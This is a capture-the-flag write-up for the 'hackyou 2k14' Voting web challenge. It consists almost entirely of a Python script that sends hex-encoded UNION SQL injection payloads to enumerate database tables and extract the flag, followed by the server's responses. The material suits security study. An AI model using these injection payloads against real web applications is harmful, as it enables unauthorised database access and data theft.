# hackyou 2k14: Web - Voting (100 points)


# cat web.py
#!/usr/bin/python

import re, urllib, urllib2

def inject(hexid):
   url    = 'http://hackyou2014tasks.ctf.su:10080/index.php'
   values = {
    'id'    : hexid,
    'vote'  : '1',
    'submit': 'Submit'
   }
   data = urllib.urlencode(values)
   req  = urllib2.Request(url, data)
   res  = urllib2.urlopen(req)
   return res.read()

hexid  = '0x' + '100 union select group_concat(table_name) from information_schema.tables'.encode('hex')
print inject(hexid)
hexid  = '0x' + '100 union select group_concat(table_name) from information_schema.tables where table_name like \'f%\''.encode('hex')
print inject(hexid)
hexid  = '0x' + '100 union select group_concat(column_name) from information_schema.columns where table_name=\'Flag\''.encode('hex')
print inject(hexid)
hexid  = '0x' + '100 union select flag from Flag'.encode('hex')
print re.search(r'CTF{.*}', inject(hexid)).group()
# ./web.py
<p><b>Thank you!</b> Results:</p><table border="1"><tr><th>Logo</th><th>Total votes</th><th>Average</th></tr><tr><td>CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,ENGINES,EVENTS,FILES,GLOBAL_STATUS,GLOBAL_VARIABLES,KEY_COLUMN_USAGE,PARAMETERS,PARTITIONS,PLUGINS,PROCESSLIST,PROFILING,REFERENTIAL_CONSTRAINTS,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,SESSION_STATUS,SESSION_VARIABLES,STATISTICS,TABLES,TABLESPACES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,INNODB_BUFFER_PAGE,INNODB_TRX,INNODB_BUFFER_POOL_STATS,INNODB_LOCK_WAITS,INNODB_CMPMEM,INNODB_CMP,INNODB_LOCKS,INNODB_CMPMEM_RESET,INNODB_CMP_RESET,INNODB_BUFFER_PAGE_LRU,columns_priv,db,event,func,general_log,help_category,help_keyword,help_relation,help_topic,host,ndb_binlog_index,plugin,proc,procs_priv,proxies_priv,servers,slow_log,tables_priv,time_zone,time_zone_leap_second,time_zone_name,time_zone_transition,time_zone_transition_type,user,cond_instances,events_waits_current,events_waits_history,events_waits_history_long,events_waits_summary_by_instance,events_waits_summary_by_thread_by_event_name,events_waits_su</td><td></td><td>0</td></tr></table><br><a href="index.php">Back</a><br>
<p><b>Thank you!</b> Results:</p><table border="1"><tr><th>Logo</th><th>Total votes</th><th>Average</th></tr><tr><td>FILES,func,file_instances,file_summary_by_event_name,file_summary_by_instance,Flag</td><td></td><td>0</td></tr></table><br><a href="index.php">Back</a><br>
<p><b>Thank you!</b> Results:</p><table border="1"><tr><th>Logo</th><th>Total votes</th><th>Average</th></tr><tr><td>flag</td><td></td><td>0</td></tr></table><br><a href="index.php">Back</a><br>
CTF{820178c33c03aaa7cfe644c691679cf8}

No comments: